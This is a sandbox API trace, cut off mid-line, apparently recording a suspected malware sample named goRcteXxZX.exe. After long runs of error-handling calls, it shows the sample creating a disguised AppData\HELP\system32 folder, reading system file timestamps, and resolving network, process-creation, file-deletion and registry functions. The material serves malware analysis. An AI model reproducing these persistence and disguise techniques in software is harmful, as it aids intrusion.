[0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.840] GetLastError () returned 0x0 [0034.840] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.841] SetLastError (dwErrCode=0x0) [0034.841] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.842] SetLastError (dwErrCode=0x0) [0034.842] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.843] SetLastError (dwErrCode=0x0) [0034.843] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.844] SetLastError (dwErrCode=0x0) [0034.844] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.845] SetLastError (dwErrCode=0x0) [0034.845] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.846] SetLastError (dwErrCode=0x0) [0034.846] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.847] SetLastError (dwErrCode=0x0) [0034.847] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.848] GetLastError () returned 0x0 [0034.848] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.849] SetLastError (dwErrCode=0x0) [0034.849] GetLastError () returned 0x0 [0034.864] SetLastError (dwErrCode=0x0) [0034.864] GetLastError () returned 0x0 [0034.864] SetLastError (dwErrCode=0x0) [0034.864] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.865] SetLastError (dwErrCode=0x0) [0034.865] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.866] SetLastError (dwErrCode=0x0) [0034.866] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.867] SetLastError (dwErrCode=0x0) [0034.867] GetLastError () returned 0x0 [0034.868] SetLastError (dwErrCode=0x0) [0034.868] GetLastError () returned 0x0 [0034.868] SetLastError (dwErrCode=0x0) [0034.868] GetLastError () returned 0x0 [0034.868] SetLastError (dwErrCode=0x0) [0034.868] GetLastError () returned 0x0 [0034.868] SetLastError (dwErrCode=0x0) [0034.868] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.868] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.868] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f538 | out: lpSystemTimeAsFileTime=0x14f538*(dwLowDateTime=0xe278a990, dwHighDateTime=0x1d3dfba)) [0034.869] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f470, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.870] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f358, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetLastError () returned 0x0 [0034.870] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.870] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.870] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.870] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.870] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.870] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.870] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.870] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.871] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.871] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.871] GetLastError () returned 0xb7 [0034.871] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.871] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.871] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.871] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.871] wsprintfA (in: param_1=0x14f1d8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.871] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.871] wsprintfA (in: param_1=0x14f0d4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.871] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.871] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.871] CloseHandle (hObject=0x74) returned 1 [0034.871] GetLastError () returned 0x0 [0034.871] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.871] GetLastError () returned 0x0 [0034.871] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.872] GetSystemDirectoryA (in: lpBuffer=0x14f1d8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.872] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.872] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.872] CloseHandle (hObject=0x74) returned 1 [0034.872] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.872] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.872] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.874] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.874] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.874] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.874] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.874] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.874] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.874] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.874] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.875] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.876] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.876] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.876] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.876] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.876] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.876] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.876] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.876] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.876] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.876] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.876] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.877] GetProcAddress (hModule=0x77720000, 